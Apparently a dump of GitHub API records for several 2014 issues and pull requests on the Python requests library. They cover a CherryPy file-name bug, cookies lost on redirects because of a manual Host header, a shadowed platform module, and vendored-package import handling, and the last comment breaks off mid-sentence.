https://api.github.com/repos/psf/requests/issues/2379/comments
https://api.github.com/repos/psf/requests/issues/2379/events
https://github.com/psf/requests/pull/2379
51,816,271
MDExOlB1bGxSZXF1ZXN0MjU5Nzk3NzQ=
2,379
utils.guess_filename fails if the given parameter looks like a file object but has a non-string name attribute
{ "avatar_url": "https://avatars.githubusercontent.com/u/973454?v=4", "events_url": "https://api.github.com/users/arthurdarcet/events{/privacy}", "followers_url": "https://api.github.com/users/arthurdarcet/followers", "following_url": "https://api.github.com/users/arthurdarcet/following{/other_user}", "gists_url": "https://api.github.com/users/arthurdarcet/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/arthurdarcet", "id": 973454, "login": "arthurdarcet", "node_id": "MDQ6VXNlcjk3MzQ1NA==", "organizations_url": "https://api.github.com/users/arthurdarcet/orgs", "received_events_url": "https://api.github.com/users/arthurdarcet/received_events", "repos_url": "https://api.github.com/users/arthurdarcet/repos", "site_admin": false, "starred_url": "https://api.github.com/users/arthurdarcet/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/arthurdarcet/subscriptions", "type": "User", "url": "https://api.github.com/users/arthurdarcet", "user_view_type": "public" }
[]
closed
true
null
[]
null
13
2014-12-12T15:16:43Z
2021-09-08T09:01:02Z
2014-12-13T19:49:04Z
CONTRIBUTOR
resolved
A cherrypy uploaded file behave like a regular file, except that its name attribute is an int and passing it directly to requests fails because of that (not sure if i should add myself to AUTHORS for this?)
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2379/reactions" }
https://api.github.com/repos/psf/requests/issues/2379/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2379.diff", "html_url": "https://github.com/psf/requests/pull/2379", "merged_at": "2014-12-13T19:49:04Z", "patch_url": "https://github.com/psf/requests/pull/2379.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2379" }
true
[ "I'm +0 on this if only because no one else has found this before and it would seem to be a bigger problem otherwise. It seems entirely harmless, but CherryPy seems to be an outlier in how it behaves here. Perhaps this is more appropriately a bug in CherryPy\n", "Yeah, that's weird. Why would its name attribute be an int? I could understand a string representation of a number, but an int? Very weird. \n", "@arthurdarcet have you reported this as a bug to CherryPy?\n", "Also this causes something of a regression. `name` could still be an instance of `builtin_str` but also be `''` which doesn't cause an exception but introduces backwards incompatible behaviour. Where we previously returned `None`, we will now return `''` which might create issues with what we end up generating with this function.\n", "Poc, which will output `<class 'int'> 11`\n\n``` python\n#!/usr/bin/env python\nimport cherrypy, requests\n\nclass Root(object):\n @cherrypy.expose\n def index(self, infile):\n print(type(infile.file.name), repr(infile.file.name))\ncherrypy.tree.mount(Root(), '/', {})\n\ncherrypy.engine.start()\nrequests.post('http://localhost:8080/', files={'infile': open(__file__)})\ncherrypy.engine.exit()\n```\n", "I've updated the commit to make sure no backward incompatible changes are introduced.\n\nI haven't reported this to cherrypy because they are only specifying that they give a file-like object with a read method, nothing more, and since name isn't part of their API it's not really a bug on their side.\n\nI agree that an int as a file name is weird to say the least, but imho requests should check that file.name indeed quack like a duck before using it like a duck.\n", "@arthurdarcet I respectfully disagree that this isn't a bug on their side.\n", "See also: https://bitbucket.org/cherrypy/cherrypy/issue/1346/uploaded-files-name-is-an-integer\n", "Hi Ian,\n\nThank you for reporting this to cherrypy, I was planning to but I haven't\nfound the time to look into it.\nI agree that integer file names should be considered a bug on cherrypy side\nbut I think this patch would only make requests a bit more resilient and is\nrelevant regardless of cherrypy issue\n\nOn Saturday, 13 December 2014, Ian Cordasco [email protected]\nwrote:\n\n> See also:\n> https://bitbucket.org/cherrypy/cherrypy/issue/1346/uploaded-files-name-is-an-integer\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/pull/2379#issuecomment-66860416\n> .\n", "I agree @arthurdarcet. I just did not want the cherrypy issue to go unreported.\n", "This makes requests no longer recognize unicode filename as valid under Python 2. See #2411.\n\nEDIT: Actual English sentence!\n", "@sjagoe come again?\n", "Edited my hastily written comment. Opening an actual issue now.\n" ]
https://api.github.com/repos/psf/requests/issues/2378
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2378/labels{/name}
https://api.github.com/repos/psf/requests/issues/2378/comments
https://api.github.com/repos/psf/requests/issues/2378/events
https://github.com/psf/requests/issues/2378
51,786,762
MDU6SXNzdWU1MTc4Njc2Mg==
2,378
readlines (without generators)
{ "avatar_url": "https://avatars.githubusercontent.com/u/5049737?v=4", "events_url": "https://api.github.com/users/femtotrader/events{/privacy}", "followers_url": "https://api.github.com/users/femtotrader/followers", "following_url": "https://api.github.com/users/femtotrader/following{/other_user}", "gists_url": "https://api.github.com/users/femtotrader/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/femtotrader", "id": 5049737, "login": "femtotrader", "node_id": "MDQ6VXNlcjUwNDk3Mzc=", "organizations_url": "https://api.github.com/users/femtotrader/orgs", "received_events_url": "https://api.github.com/users/femtotrader/received_events", "repos_url": "https://api.github.com/users/femtotrader/repos", "site_admin": false, "starred_url": "https://api.github.com/users/femtotrader/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/femtotrader/subscriptions", "type": "User", "url": "https://api.github.com/users/femtotrader", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-12T09:40:28Z
2021-09-08T23:06:50Z
2014-12-12T16:21:22Z
NONE
resolved
Hello, I'm moving some Python code from `urlopen` to `requests` (because it will be easier for me to add a db cache (SQLite) mechanism using requests-cache) The code I want to modify looks like ``` with urlopen(url) as resp: lines = resp.readlines() ``` I don't find any equivalent to `readlines()` Any idea ? I have found a generator solution like ``` import requests import requests_cache requests_cache.install_cache('cache', backend='sqlite', expire_after=60*5) response = requests.get('http://finance.yahoo.com/d/quotes.csv?s=AAPL+F&f=l1srs7t1p2', stream=True) for line in response.iter_lines(): print(line) ``` but requests_cache doesn't seems to like this stream parameter see https://github.com/reclosedev/requests-cache/issues/33 So there is 2 solutions (and both can be valuable). 1. fix requests-cache : that's what I'm asking to @reclosedev 2. provide a request readlines() method (or give a tip to have something like that which will return a list and not a generator) That will be very nice. Thanks for requests... that's a great lib for humans
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2378/reactions" }
https://api.github.com/repos/psf/requests/issues/2378/timeline
null
completed
null
null
false
[ "We will not be providing a `readlines` method. This is most certainly a bug in requests-cache and one I haven't seen or heard of in [CacheControl](https://github.com/ionrock/cachecontrol) which is our recommended caching library.\n\nFor what it's worth you can do:\n\n``` python\nimport requests\n\nwith requests.get(url, stream=True) as resp:\n lines = list(resp.iter_lines())\n```\n\nThat will give you a list of lines, but it will not fix the requests-cache bug, because that's a bug in that caching library.\n" ]
https://api.github.com/repos/psf/requests/issues/2377
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2377/labels{/name}
https://api.github.com/repos/psf/requests/issues/2377/comments
https://api.github.com/repos/psf/requests/issues/2377/events
https://github.com/psf/requests/issues/2377
51,670,274
MDU6SXNzdWU1MTY3MDI3NA==
2,377
Set Cookie does not work properly with HTTP 302
{ "avatar_url": "https://avatars.githubusercontent.com/u/10153173?v=4", "events_url": "https://api.github.com/users/antoniofelleca/events{/privacy}", "followers_url": "https://api.github.com/users/antoniofelleca/followers", "following_url": "https://api.github.com/users/antoniofelleca/following{/other_user}", "gists_url": "https://api.github.com/users/antoniofelleca/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/antoniofelleca", "id": 10153173, "login": "antoniofelleca", "node_id": "MDQ6VXNlcjEwMTUzMTcz", "organizations_url": "https://api.github.com/users/antoniofelleca/orgs", "received_events_url": "https://api.github.com/users/antoniofelleca/received_events", "repos_url": "https://api.github.com/users/antoniofelleca/repos", "site_admin": false, "starred_url": "https://api.github.com/users/antoniofelleca/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/antoniofelleca/subscriptions", "type": "User", "url": "https://api.github.com/users/antoniofelleca", "user_view_type": "public" }
[]
closed
true
null
[]
null
8
2014-12-11T10:31:05Z
2021-09-08T23:06:49Z
2014-12-18T23:22:51Z
NONE
resolved
Python Requests 2.4.3 Python 3.4 - windows 7 (64 bit) Scenario: Performing this request: GET on URL: http://fantacalcio.repubblica.it/login.phpSSID=exjlkfpnaqaqpzqrrrzxjehfxpravrhdvjzjrkqpkraqdpee I send this Header: {'Pragma': 'max-age=0', 'Origin': 'https://login.kataweb.it', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,es;q=0.2', 'Host': 'login.kataweb.it', 'Cache-Control': 'no-cache', 'Referer': 'https://login.kataweb.it/registrazione/repubblicafantacalcio/login.jsp?ssoOnly=false&backurl=http%3A%2F%2Fwww.fantacalcio.kataweb.it%2Fsocial%2Fsites%2Ffantacalcio%2Ffantacalciosocial%2Fcampionato%2Floader.php%3FmClose%3D2%26backUrl%3Dhttp%253A%2F%2Ffantacalcio.repubblica.it%2Flogin.php&optbackurl=http%3A%2F%2Fwww.fantacalcio.kataweb.it%2Fsocial%2Fsites%2Ffantacalcio%2Ffantacalciosocial%2Fcampionato%2Floader.php%3FmClose%3D2%26backUrl%3Dhttp%253A%2F%2Ffantacalcio.repubblica.it%2Flogin.php', 'Accept-Encoding': 'gzip,deflate,sdch', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8', 'Proxy-Connection': 'keep-alive', 'Connection': 'keep-alive'} and I receive this answer: (a HTTP 302) with header: {'Expires': 'Thu, 11 Dec 2014 10:22:37 GMT', 'Set-Cookie': 'fantarep_new=0298b7c7bdd9d45ecf5749e8c1fdd5_383207; expires=Fri, 12-Dec-2014 10:22:38 GMT; path=/; domain=.fantacalcio.repubblica.it', 'Age': '0', 'X-Cacheable': 'NO:Not Cacheable', 'Accept-Ranges': 'bytes', 'Content-Length': '20', 'Content-Type': 'text/html', 'Proxy-Connection': 'keep-alive', 'X-Cache-Lookup': 'MISS from proxy1.altranit.corp.altran.com:8080', 'X-Cache': 'MISS from proxy1.altranit.corp.altran.com', 'Via': '1.0 proxy1.altranit.corp.altran.com:8080 (squid/2.6.STABLE21)', 'Vary': 'Accept-Encoding', 'Content-Encoding': 'gzip', 'Server': 'Apache', 'Date': 'Thu, 11 Dec 2014 10:22:38 GMT', 'Cache-Control': 'max-age=0', 'Location': 'index.php?page=sqdlist&ck_fantacalcio=0298b7c7bdd9d45ecf5749e8c1fdd5&global=0&first=1'} I've this Cookies (BEFORE THE REQUEST IS PERFORMED) {'FCSOCIAL': 'FCSOCIAL_bb828ef8c292284073012f2931d739', 'gac_3_8ODxzU7xh4eFL2a_mtwjaR5JKoyX0az0MLmAfUYg8kCc2Eo63vmDP9Z3tSI7lS0h': 'VC1_E4E1B47C0B7B0D2C71751CA6855405AF_c718efX2eyW82F0KfQyyZN6hRDxp-4Gn7zYqHu-PRsb2SxHyopuk99ljuVBhks6c8E5PtMxYZEUy0IATFSkvHUPiuc4eqRyUMAYrmQLwDOy_72I4tzk6xOpSJf3s1pLTekn-zZ-TYnkIsk0vsWeHWQ%3D%3D', 'KWSSO': '"{hashId:4648b93f7efac4f16581aab27b7396e4,sessionId:1418293351099,criptKey:1ADBC72C64E0735AA89F96D77294AC827267F01B8FF4397D8D7095B4FD591E59E7033A46928DC087726DB1602EFCFCC5C1FE4A5C0E378C7C}"', 'JSESSIONID': 'F1124C14EE69AF8794998C5BF4BF65D6'} BUT the SET COOKIE --> 'fantarep_new=0298b7c7bdd9d45ecf5749e8c1fdd5_383207; is ignored. The http_session.cookies.get_dict()) after the 302 does not return the list updated. Hoping can help
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2377/reactions" }
https://api.github.com/repos/psf/requests/issues/2377/timeline
null
completed
null
null
false
[ "Can you run your code and then do this please?\n\n``` python\nfor h in r.history:\n print h.status_code\n print h.headers\n print h.request.headers\n```\n", "## Your problem is that you're specifying the Host header. We special case cookie parsing when you do that.\n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Lukasa, your code does not produce anything... I'm sure that it's my fault.\n\nI have:\n\nmysession=Session()\n......[SOME CODE]\nmyget=mysession.get(nexturl, proxies=myproxy,allow_redirects=False)\nprint_details(mysession,\"GET\",myget)\n\nwhere with print_details I have a function designed just to debug:\n\ndef print_details(http_session,metodo,http_request):\n print(\"\\n METODO:\",metodo)\n print(\"URL:\",http_request.url)\n print(\"HEADER RICHIESTA:\",http_session.headers)\n print(\"CODICE RISPOSTA:\",http_request.status_code)\n print(\"COOKIES SESSIONE:\",http_session.cookies.get_dict())\n print(\"HEADER RISPOSTA:\",http_request.headers)\n\nI'm less than newbie in Python, but I've noted that if a HTTP response have more than one SET_COOKIE the second one is not considered. (this is an additional problem...that I'd like to investigate more before open a bug)\n\nThank you for your patience\n", "This is a direct consequence of supportiing https://github.com/kennethreitz/requests/issues/1638. You should remove your `Host` header that you specify and _then_ this should just work @antoniofelleca \n", "Ok, I'll try. \n\nBut the result is that is not possible to specify a header?\n\nIs it correct?\n\nThanks\n", "You should almost never specify the `Host` header. You _can_ specify other headers. You _can_ specify the `Host` header, but you _should not_ specify it, especially if you want requests to handle these cookies for you\n", "@antoniofelleca any updates?\n", "Hi,\n\nI've run some tests: sigmavirus24 was right! Without specifying HOST header both issues disappear.\n\nAny server header with a double SET COOKIE was correctly handled, and the set cookie in 302 work fine.\n\nLet me thank you for your support and patience. Probably this [correct] behaviour should be descripted: I've met some discussions on Stackoverflow reporting this (false)issue.\n" ]
https://api.github.com/repos/psf/requests/issues/2376
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2376/labels{/name}
https://api.github.com/repos/psf/requests/issues/2376/comments
https://api.github.com/repos/psf/requests/issues/2376/events
https://github.com/psf/requests/issues/2376
51,559,396
MDU6SXNzdWU1MTU1OTM5Ng==
2,376
AttributeError: 'module' object has no attribute 'python_implementation'
{ "avatar_url": "https://avatars.githubusercontent.com/u/914786?v=4", "events_url": "https://api.github.com/users/reddypdl/events{/privacy}", "followers_url": "https://api.github.com/users/reddypdl/followers", "following_url": "https://api.github.com/users/reddypdl/following{/other_user}", "gists_url": "https://api.github.com/users/reddypdl/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/reddypdl", "id": 914786, "login": "reddypdl", "node_id": "MDQ6VXNlcjkxNDc4Ng==", "organizations_url": "https://api.github.com/users/reddypdl/orgs", "received_events_url": "https://api.github.com/users/reddypdl/received_events", "repos_url": "https://api.github.com/users/reddypdl/repos", "site_admin": false, "starred_url": "https://api.github.com/users/reddypdl/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/reddypdl/subscriptions", "type": "User", "url": "https://api.github.com/users/reddypdl", "user_view_type": "public" }
[ { "color": "e11d21", "default": false, "description": null, "id": 136589914, "name": "Needs Info", "node_id": "MDU6TGFiZWwxMzY1ODk5MTQ=", "url": "https://api.github.com/repos/psf/requests/labels/Needs%20Info" } ]
closed
true
null
[]
null
2
2014-12-10T13:44:15Z
2021-09-08T23:06:50Z
2014-12-11T07:22:59Z
NONE
resolved
``` Python 2.7.3 (default, Feb 27 2014, 19:58:35) [GCC 4.6.3] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import requests >>> req = requests.request('GET', 'http://httpbin.org/get') Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/symbol/python2.7.3/local/lib/python2.7/site-packages/requests/api.py", line 48, in request session = sessions.Session() File "/home/symbol/python2.7.3/local/lib/python2.7/site-packages/requests/sessions.py", line 284, in __init__ self.headers = default_headers() File "/home/symbol/python2.7.3/local/lib/python2.7/site-packages/requests/utils.py", line 552, in default_headers 'User-Agent': default_user_agent(), File "/home/symbol/python2.7.3/local/lib/python2.7/site-packages/requests/utils.py", line 521, in default_user_agent _implementation = platform.python_implementation() AttributeError: 'module' object has no attribute 'python_implementation' ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/914786?v=4", "events_url": "https://api.github.com/users/reddypdl/events{/privacy}", "followers_url": "https://api.github.com/users/reddypdl/followers", "following_url": "https://api.github.com/users/reddypdl/following{/other_user}", "gists_url": "https://api.github.com/users/reddypdl/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/reddypdl", "id": 914786, "login": "reddypdl", "node_id": "MDQ6VXNlcjkxNDc4Ng==", "organizations_url": "https://api.github.com/users/reddypdl/orgs", "received_events_url": "https://api.github.com/users/reddypdl/received_events", "repos_url": "https://api.github.com/users/reddypdl/repos", "site_admin": false, "starred_url": "https://api.github.com/users/reddypdl/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/reddypdl/subscriptions", "type": "User", "url": "https://api.github.com/users/reddypdl", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2376/reactions" }
https://api.github.com/repos/psf/requests/issues/2376/timeline
null
completed
null
null
false
[ "@reddypdl can you do `python -c 'import platform; print(platform.python_implementation())'`, if not can you tell us how you built this version of Python? The `platform` module is a standard library module and `platform.python_implementation()` has been around since Python 2.3 so if this is a real version of Python 2.7, then that function should be present. Also is it possible you have a `platform.py` file in the same directory? If so, please rename it.\n", "Thanks sigmavirus24 , i had a python package called platform in the same folder , so it was picking-up automatically. \n" ]
https://api.github.com/repos/psf/requests/issues/2375
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2375/labels{/name}
https://api.github.com/repos/psf/requests/issues/2375/comments
https://api.github.com/repos/psf/requests/issues/2375/events
https://github.com/psf/requests/pull/2375
51,382,319
MDExOlB1bGxSZXF1ZXN0MjU3MTYxMjc=
2,375
Copy pip's import machinery wholesale
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "e10c02", "default": false, "description": null, "id": 117744, "name": "Bug", "node_id": "MDU6TGFiZWwxMTc3NDQ=", "url": "https://api.github.com/repos/psf/requests/labels/Bug" } ]
closed
true
null
[]
null
39
2014-12-09T02:58:42Z
2021-09-08T09:01:00Z
2015-01-09T20:38:31Z
CONTRIBUTOR
resolved
Fedora and Debian have both recently added symlinks to their distributions of requests so people can do `from requests.packages import urllib3` but they seem to still rewrite our import statements. So the following situation is possible: - User registers adapter for custom scheme - User does the following: ``` python from requests.packages.urllib3 import poolmanager poolmanager.pool_classes_by_scheme['glance+https'] = HTTPSConectionPool ``` - When they do `s.get('glance+https://...')` they see a `KeyError` because the urllib3 we're using in requests is not the one they've imported (according to `sys.modules`). Pip works around this with the copied machinery. The tests seem to work just fine for me. I still need to test this with our vendored packages removed and urllib3/chardet installed separately. /cc @dstufft @eriolv @ralphbean
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2375/reactions" }
https://api.github.com/repos/psf/requests/issues/2375/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2375.diff", "html_url": "https://github.com/psf/requests/pull/2375", "merged_at": "2015-01-09T20:38:31Z", "patch_url": "https://github.com/psf/requests/pull/2375.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2375" }
true
[ "I don't really see why this is our problem. Debian/downstream have introduced this bug, why are we the ones fixing it?\n", "The reason pip did this is primarily because while it annoys me to no end what the downstream re-distributors do I felt that ultimately it was better for the end-users if we made sure this particular bug was fixed. In the end, as much as I wish they wouldn't, downstream is going to unbundle stuff and I think it's wholly better if they all do it in the same way that works more or less transparently than if each one invents it's own way of doing it with it's own caveats.\n", "@Lukasa because it's faster if we fix it and provide a little extra flexibility at ~~no~~ little extra cost.\n", "Hello,\nI can understand how @lukasa is annoyed by unvendoring made downstream, but I can also understand why this is done. For example, in Debian, Python SSLv3 support was removed and I only had to patch (I forwared my patch upstream of course[¹]) urllib3 to fix all packages depending on urllib3.\n\nSo, yes, this is a downstream problem, but as in past (even when this issue arosed on Debian Bug Tracker) I will never add something without asking first if you, upstream developers, are ok with a downstream change. \n As I said a lot of time before being the Debian maintainer of requests I'm one of its users: I want requests to be in the best shape in Debian. :)\n\nI agree with @dstufft and @sigmavirus24 but, if you don't agree, I can also replace the currently used patch in Debian with this so, at least, Debian, Ubuntu and pip will use the same code.\nIMHO cooperating we will arrive to the best solution for all.\n\n[¹] http://anonscm.debian.org/viewvc/python-modules/packages/python-urllib3/tags/1.9.1-3/debian/patches/06_do-not-make-SSLv3-mandatory.patch?view=markup Yes, next time I will use a PR, fortunately @dstufft forwarded it properly! :)\n", "@eriolv question: Since the symlink is in place (it may just be Fedora that has this in place), is there any chance of the imports that import from `.packages` inside of requests could not be rewritten? \n\nIf not, can the imports not be rewritten after we ship this patch? (After we've updated it to give proper attribution to @dstufft and pypa/pip) The crux of this issue is that sys.modules is incorrectly populated and needs to work a certain way for users to not run into surprises like this.\n\n[/Edit - I submitted my comment too soon]\nAnd I appreciate your collaboration @eriolv. That's why I pinged you immediately. I wanted to make you aware of this from the start and get your feedback as well as @Lukasa's and @ralphbean's\n", "You don't need to rewrite imports with either the symlinks or this solution. The major difference between symlinks and this solution is. With symlinks the import system is going to see `urllib3` and `requests.packages.urllib3` as two different things. With this it should treat them as the same because it's just aliases the exact same module object in `sys.modules`. This _should_ mean, though I don't think I tested it, that it doesn't matter if people import from `urllib3` or `requests.packages.urllib3`.\n", "My snarkiness was mostly the result of me waking up late and being late for work and having not had coffee, apologies all.\n\nIn reality I'm +0 on this. I don't like that we have to do it, and the unvendoring zealots have hardened my opinion towards the idea of doing them any favours on any issue whatsoever. (I don't include you in that group @eriolv, you have not displayed any zealotry that I'm aware of :wink: )\n\nHowever, I acknowledge the Catch-22 of the fact that _we_ will get blamed for the zealots decision to unbundle us breaking their code. For that reason I have no intention of blocking this patch: punishing users is unacceptable.\n\nHowever, I'd like _someone_ to test the change, as neither @sigmavirus24 nor @dstufft appear to have. Ideally I'd like some form of automated testing for it as well: having that would raise me to +0.5.\n", "To be clear, I tested it in the context of pip :) I have not tested it in the context of requests. The major difference being that pip's bundled stuff isn't generally imported outside of pip. In pip we also modify the `setup.py` so there is an environment variable that downstream can set to unbundle things without patching which raises a warning saying that it's an unsupported mechanism for installing pip. We then use this to install pip unbundled and run all of our tests in CI with installed copies of everything. However a difference between pip and requests in this is that pip will only bundle a released copy of something and we also have a vendor.txt which is a file in the requirements.txt file format which lists the exact versions we've bundled. So we can easily install the required things by just doing `pip install -r pip/_vendor/vendor.txt`.\n", "To be more clear! I know that this will make it so that `import requests.packages.urllib3` will fall back to `import urllib3` automatically without doing an import writes. The thing I haven't tested is that you can do something like:\n\n``` python\nimport requests.packages.urllib3``\nimport urllib3\n\nassert isinstance(urllib3.Timeout, requests.packages.urllib3.Timeout)\n```\n", "Oh, and I wrote this in it's entirety, so feel free to license/attribute it however you want. I don't really care.\n", "@dstufft Indeed, and that's what's important. I want to make sure that if we're doing this we do it right the first time.\n\nNote that it obviously won't do that on vendored systems. =)\n", "Yea, well really people should just always import from `requests.packages` and never from the top level packages if they are using things in conjunction with requests, but yea it +1 on testing that it works the way I think it does :D\n", "> Fedora and Debian have both recently added symlinks to their distributions of requests so people can do from requests.packages import urllib3 but they seem to still rewrite our import statements\n\nHey, in Fedora rawhide (the most advanced branch, the \"rolling release\") we're not rewriting the imports anymore. That patch didn't make it into Fedora 21 though -- just released yesterday.\n", "Thanks @ralphbean. Will Fedora 21 be able to generate a new build with this change at least?\n\nAlso, to everyone commenting on the fact that this file still references pip, I pulled this in and committed it to start a discussion. This will not be merged as is.\n", "> Will Fedora 21 be able to generate a new build with this change at least?\n\nYes, it can. We needed to let it sit frozen in preparation for that initial release.\n", "This is so annoying :)\n", "I dislike everything about this.\n\nNot saying we shouldn't be doing it yet — just documenting my feelings.\n", "So I did the following:\n\n```\n$ mktmpenv -ppython{{version}}\n$ pip install /path/to/requests/ # Where this is the git repo checked out on this branch\n$ cd lib/python{{version}}/site-packages/requests/packages/\n$ rm -rf chardet urllib3\n$ cd - # Back in the temporary virtualenv directory\n$ pip install chardet urllib3\n$ python\n```\n\nThen at the console I did\n\n``` py\n>>> import requests\n>>> requests.get('https://httpbin.org/get')\n<Response [200]>\n>>> import sys\n>>> sys.modules['requests.packages.urllib3']\n<module 'urllib3' from '/Users/ian7708/virtualenv/tmp-421360116860cb19/lib/python2.7/site-packages/urllib3/__init__.pyc'>\n>>> import urllib3\n>>> sys.modules['requests.packages.urllib3'] is urllib3\nTrue\n```\n\nSo we're getting the right module and it has the right name. I'm forgetting though, were there other things we need to check?\n", "It should hold true but the only thing I can think of is make sure that `assert isinstance(urllib3.Timeout, requests.packages.urllib3.Timeout)` is `True`.\n", "``` py\n>>> isinstance(urllib3.Timeout(5), requests.packages.urllib3.Timeout)\nTrue\n```\n", "It should totally work then.\n", "I'm comfortable using this. It'd be great to have access to our CI and set up a job for this but I'm 